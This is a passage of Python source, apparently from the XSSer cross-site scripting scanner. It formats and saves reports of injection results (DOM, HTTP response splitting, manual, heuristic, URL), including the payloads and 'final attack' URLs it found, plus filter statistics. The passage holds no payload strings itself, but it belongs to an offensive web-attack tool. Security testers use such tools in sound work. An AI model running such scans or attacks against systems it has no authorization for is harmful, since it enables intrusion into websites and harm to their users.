(Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n") fout.write("="*75 + "\n\n") elif line[1] == "[Document Object Model Injection]": self.dom_found = self.dom_found + 1 if len(self.hash_found) < 11: if line[4]: # when query string self.report("[+] Target:", line[6] + " | " + line[4]) else: self.report("[+] Target:", line[6]) self.report("[+] Vector: [ " + str(line[2]) + " ]") self.report("[!] Method: DOM") self.report("[*] Hash:", line[3]) self.report("[*] Payload:", line[0]) self.report("[!] Vulnerable: DOM (Document Object Model)") if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: self.report("[*] Final Attack:", attack_url) self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n") if self.options.fileoutput: fout.write("="*75) fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n") fout.write("="*75 + "\n\n") for h in self.hash_found: if h[1] == "[Document Object Model Injection]": if h[4]: if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n") else: if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n") fout.write("="*75 + "\n\n") elif line[1] == "[Induced Injection]": self.httpsr_found = self.httpsr_found +1 if len(self.hash_found) < 11: if line[4]: # when query string self.report("[+] Target:", line[6] + " | " + line[4]) else: self.report("[+] Target:", line[6]) self.report("[+] Vector: [ " + str(line[2]) + " ]") self.report("[!] Method: INDUCED") self.report("[*] Hash:", line[3]) self.report("[*] Payload:", line[0]) self.report("[!] Vulnerable: HTTPsr ( HTTP Splitting Response)") if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: self.report("[*] Final Attack:", attack_url) self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n") if self.options.fileoutput: fout.write("="*75) fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n") fout.write("="*75 + "\n\n") for h in self.hash_found: if h[4]: if h[1] == "[Induced Injection]": if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n") else: if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n") fout.write("="*75 + "\n\n") elif line[1] == "[hashing check]": if len(self.hash_found) < 11: if line[4]: self.report("[+] Target:", line[6] + " | " + line[4]) else: self.report("[+] Target:", line[6]) self.report("[+] Vector: [ " + str(line[3]) + " ]") self.report("[!] Method:", line[2]) self.report("[*] Payload:", line[5]) self.report("[!] Status: HASH FOUND!", "\n", '-'*50, "\n") if self.options.fileoutput: fout.write("="*75) fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n") fout.write("="*75 + "\n\n") for h in self.hash_found: if h[1] == "[hashing check]": if h[4]: fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n") else: fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n") fout.write("="*75 + "\n\n") elif line[1] == "[manual_injection]": self.manual_found = self.manual_found + 1 if len(self.hash_found) < 11: if line[4]: # when query string self.report("[+] Target:", line[6] + " | " + line[4]) else: self.report("[+] Target:", line[6]) self.report("[+] Vector: [ " + str(line[2]) + " ]") self.report("[!] Method: MANUAL") self.report("[*] Hash:", line[3]) self.report("[*] Payload:", line[0]) if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: self.report("[*] Final Attack:", attack_url) self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n") if self.options.fileoutput: fout.write("="*75) fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n") fout.write("="*75 + "\n\n") for line in self.hash_found: if line[4]: if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND!\n\n") else: if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND!\n\n") fout.write("="*75 + "\n\n") elif line[1] == "[Heuristic test]": if len(self.hash_found) < 11: if line[4]: self.report("[+] Target:", line[6] + " | " + line[4]) else: self.report("[+] Target:", line[6]) self.report("[+] Vector: [ " + str(line[3]) + " ]") self.report("[!] Method:", line[2]) self.report("[*] Payload:", line[5]) self.report("[!] Status: NOT FILTERED!", "\n", '-'*50, "\n") if self.options.fileoutput: fout.write("="*75) fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n") fout.write("="*75 + "\n\n") for line in self.hash_found: if line[4]: fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n") else: fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n") fout.write("="*75 + "\n\n") else: self.auto_found = self.auto_found + 1 if len(self.hash_found) < 11: if line[4]: # when query string self.report("[+] Target:", line[6] + " | " + line[4]) else: self.report("[+] Target:", line[6]) self.report("[+] Vector: [ " + str(line[2]) + " ]") self.report("[!] Method: URL") self.report("[*] Hash:", line[3]) self.report("[*] Payload:", line[0]) self.report("[!] Vulnerable:", line[1]) if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: self.report("[*] Final Attack:", attack_url) self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n") if self.options.fileoutput: fout.write("="*75) fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n") fout.write("="*75 + "\n\n") for line in self.hash_found: if line[4]: if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n") else: if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n") fout.write("="*75 + "\n\n") if self.options.fileoutput: fout.close() if self.options.fileoutput and not self.options.filexml: self.report("[Info] Generating report: [ XSSreport.raw ]\n") self.report("-"*25+"\n") if self.options.fileoutput and self.options.filexml: self.report("[Info] Generating report: [ XSSreport.raw ] | Exporting results to: [ " + str(self.options.filexml) + " ] \n") self.report("-"*25+"\n") if len(self.hash_found) > 10 and not self.options.fileoutput: # write results fo file when large output (white magic!) if not self.options.filexml: self.report("[Info] Aborting large screen output. Generating report: [ XSSreport.raw ]\n") self.report("-"*25+"\n") fout = open("XSSreport.raw", "w") # write better than append fout.write("="*75) fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n") fout.write("="*75 + "\n\n") for line in self.hash_found: if line[4]: if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n") else: if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n") fout.write("="*75 + "\n\n") fout.close() else: self.report("[Info] Exporting results to: [ " + str(self.options.filexml) + " ]\n") self.report("-"*25+"\n") # heuristic always with statistics if self.options.heuristic: heuris_semicolon_total_found = self.heuris_semicolon_found + self.heuris_une_semicolon_found + self.heuris_dec_semicolon_found heuris_backslash_total_found = self.heuris_backslash_found + self.heuris_une_backslash_found + self.heuris_dec_backslash_found heuris_slash_total_found = self.heuris_slash_found + self.heuris_une_slash_found + self.heuris_dec_slash_found heuris_minor_total_found = self.heuris_minor_found + self.heuris_une_minor_found + self.heuris_dec_minor_found heuris_mayor_total_found = self.heuris_mayor_found + self.heuris_une_mayor_found + self.heuris_dec_mayor_found heuris_doublecolon_total_found = self.heuris_doublecolon_found + self.heuris_une_doublecolon_found + self.heuris_dec_doublecolon_found heuris_colon_total_found = self.heuris_colon_found + self.heuris_une_colon_found + self.heuris_dec_colon_found heuris_equal_total_found = self.heuris_equal_found + self.heuris_une_equal_found + self.heuris_dec_equal_found total_heuris_found = heuris_semicolon_total_found + heuris_backslash_total_found + heuris_slash_total_found + heuris_minor_total_found + heuris_mayor_total_found + heuris_doublecolon_total_found + heuris_colon_total_found + heuris_equal_total_found total_heuris_params = total_heuris_found + self.heuris_semicolon_found + self.heuris_backslash_found + self.heuris_slash_found + self.heuris_minor_found + self.heuris_mayor_found + self.heuris_doublecolon_found + self.heuris_colon_found + self.heuris_equal_found total_heuris_notfound = self.heuris_semicolon_notfound + self.heuris_backslash_notfound + self.heuris_slash_notfound + self.heuris_minor_notfound + self.heuris_mayor_notfound + self.heuris_doublecolon_notfound + self.heuris_colon_notfound + self.heuris_equal_notfound if total_heuris_notfound > 0: # not shown when not found self.options.statistics = True # some statistics reports if self.options.statistics: # heuristic test results if self.options.heuristic: self.report("\n"+'='*75) self.report("[+] Heuristics:") self.report('='*75) test_time = datetime.datetime.now() - self.time self.report("\n" + '-'*50) self.report("Test Time Duration: ", test_time) self.report('-'*50 ) total_connections = total_heuris_found + total_heuris_notfound self.report("Total fuzzed:", total_connections) self.report('-'*75) self.report(' ', " ", " ", " =" , " ASCII", "+", "UNE/HEX", "+", "DEC") # semicolon results self.report('; ', " ", self.heuris_semicolon_notfound, " ", heuris_semicolon_total_found, " ", self.heuris_semicolon_found, " ", self.heuris_une_semicolon_found, " ", self.heuris_dec_semicolon_found) # backslash results self.report('\\ ', " ", self.heuris_backslash_notfound, " ", heuris_backslash_total_found, " ", self.heuris_backslash_found, " ", self.heuris_une_backslash_found, " ", self.heuris_dec_backslash_found) # slash results self.report("/ ", " ", self.heuris_slash_notfound, " ", heuris_slash_total_found, " ", self.heuris_slash_found, " ", self.heuris_une_slash_found, " ", self.heuris_dec_slash_found) # minor results self.report("< ", " ", self.heuris_minor_notfound, " ", heuris_minor_total_found, " ", self.heuris_minor_found, " ", self.heuris_une_minor_found, " ", self.heuris_dec_minor_found) # mayor results self.report("> ", " ", self.heuris_mayor_notfound, " ", heuris_mayor_total_found, " ", self.heuris_mayor_found, " ", self.heuris_une_mayor_found, " ", self.heuris_dec_mayor_found) # doublecolon results self.report('" ', " ", self.heuris_doublecolon_notfound, " ", heuris_doublecolon_total_found, " ", self.heuris_doublecolon_found, " ", self.heuris_une_doublecolon_found, " ", self.heuris_dec_doublecolon_found) # colon results self.report("' ", " ", self.heuris_colon_notfound, " ", heuris_colon_total_found, " ", self.heuris_colon_found, " ", self.heuris_une_colon_found, " ", self.heuris_dec_colon_found) # equal results self.report("= ", " ", self.heuris_equal_notfound, " ", heuris_equal_total_found, " ", self.heuris_equal_found, " ", self.heuris_une_equal_found, " ", self.heuris_dec_equal_found) self.report('-'*75) try: _accur = total_heuris_found * 100 / total_heuris_params except ZeroDivisionError: _accur = 0 self.report('Target(s) Filtering Accur: %s %%' % _accur) self.report('-'*75) # statistics block if len(self.hash_found) + len(self.hash_notfound) == 0: pass if self.options.heuristic: pass else: self.report('='*75) self.report("[+] Statistics:") self.report('='*75) test_time = datetime.datetime.now() - self.time self.report("\n" + '-'*50) self.report("Test Time Duration: ", test_time) self.report('-'*50 ) total_connections = self.success_connection + self.not_connection + self.forwarded_connection + self.other_connection self.report("Total Connections:", total_connections) self.report('-'*25) self.report("200-OK:" , self.success_connection , "|", "404:" , self.not_connection , "|" , "503:" , self.forwarded_connection , "|" , "Others:", self.other_connection) try: _accur = self.success_connection * 100 / total_connections except ZeroDivisionError: _accur = 0 self.report("Connec: %s %%" % _accur) self.report('-'*50) total_payloads = self.check_positives + self.manual_injection + self.auto_injection + self.dcp_injection + self.dom_injection + self.xsa_injection + self.xsr_injection + self.coo_injection self.report("Total Payloads:", total_payloads) self.report('-'*25) self.report("Checker:", self.check_positives, "|", "Manual:", self.manual_injection, "|" , "Auto:" , self.auto_injection ,"|", "DCP:", self.dcp_injection, "|", "DOM:", self.dom_injection, "|", "Induced:", self.httpsr_injection, "|" , "XSR:", self.xsr_injection, "|", "XSA:", self.xsa_injection , "|", "COO:", self.coo_injection) self.report('-'*50) self.report("Total Injections:" , len(self.hash_notfound) + len(self.hash_found)) self.report('-'*25) self.report("Failed:" , len(self.hash_notfound), "|", "Successful:" , len(self.hash_found)) try: _accur = len(self.hash_found) * 100 / total_injections except ZeroDivisionError: _accur = 0 self.report("Accur : %s %%" % _accur) self.report("\n" + '='*50) total_discovered = self.false_positives + self.manual_found + self.auto_found + self.dcp_found + self.dom_found + self.xsr_found + self.xsa_found + self.coo_found self.report("\n" + '-'*50) self.report("Total XSS Discovered:", total_discovered) self.report('-'*50) self.report("Checker:", self.false_positives, "|", "Manual:",self.manual_found, "|", "Auto:", self.auto_found, "|", "DCP:", self.dcp_found, "|", "DOM:", self.dom_found, "|", "Induced:", self.httpsr_found, "|" , "XSR:", self.xsr_found, "|", "XSA:", self.xsa_found, "|", "COO:", self.coo_found) self.report('-'*50) self.report("False positives:", self.false_positives, "|", "Vulnerables:", total_discovered - self.false_positives) self.report('-'*25) # efficiency ranking: # algor= vulnerables + false positives - failed * extras mana = 0 if self.hash_found > 3: mana = mana + 4500 if self.hash_found == 1: mana = mana + 500 if self.options.reversecheck: mana = mana + 200 if total_payloads > 100: mana = mana + 150 if not self.options.xsser_gtk: mana = mana + 25 if self.options.discode: mana = mana + 100 if self.options.proxy: mana = mana + 100 if self.options.threads > 9: mana = mana + 100 if self.options.heuristic: mana = mana + 100 if self.options.finalpayload or self.options.finalremote: mana = mana + 100 if self.options.script: mana = mana + 100 if self.options.Cem or self.options.Doo: mana = mana + 75 if self.options.heuristic: mana = mana + 50 if self.options.script and not self.options.fuzz: mana = mana + 25 if self.options.followred and self.options.fli: mana = mana + 25 if self.options.wizard: mana = mana + 25 if self.options.dcp: mana = mana + 25 if self.options.hash: mana = mana + 10 mana = (len(self.hash_found) * mana) + mana -4500 # enjoy it :) self.report("Mana:", mana) self.report("") c = Curl() if not len(self.hash_found) and self.hash_notfound: if self.options.hash: if self.options.statistics: self.report('='*75 + '\n') self.report("[Info] Target isn't replying to the input [ --hash ] sent!\n") else: if self.options.target or self.options.heuristic: self.report("") if self.options.heuristic: pass else: if self.options.statistics: self.report('='*75 + '\n') if self.options.fileoutput: fout = open("XSSreport.raw", "w") # write better than append fout.write("="*75) fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n") fout.write("="*75 + "\n\n") for h in self.hash_notfound: if h[2] == 'heuristic': if not h[4]: fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n") else: fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n") elif h[2] == 'hashing check': if not h[4]: fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n") else: fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n") else: if h[4]: if h[2] == "XSA": fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n") elif h[2] == "XSR": fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n") elif h[2] == "COO": fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n") else: fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n") else: if h[2] == "XSA": fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n") elif h[2] == "XSR": fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n") elif h[2] == "COO": fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n") else: fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n") fout.write("="*75 + "\n\n") fout.close() else: # some exits and info for some bad situations: if len(self.hash_found) + len(self.hash_notfound) == 0 and not Exception: self.report("\n[Error] XSSer cannot send any data... maybe -something- is blocking connection(s)!?\n") if len(self.hash_found) + len(self.hash_notfound) == 0 and self.options.crawling: if self.options.xsser_gtk: self.report('='*75) self.report("\n[Error] Not any feedback from crawler... Aborting! :(\n") self.report('='*75 + '\n') # print results to xml file if self.options.filexml: xml_report_results = xml_reporting(self) try: xml_report_results.print_xml_results(self.options.filexml) except: return if __name__ == "__main__": app = xsser() options = app.create_options() if options: app.set_options(options) app.run() app.land(True)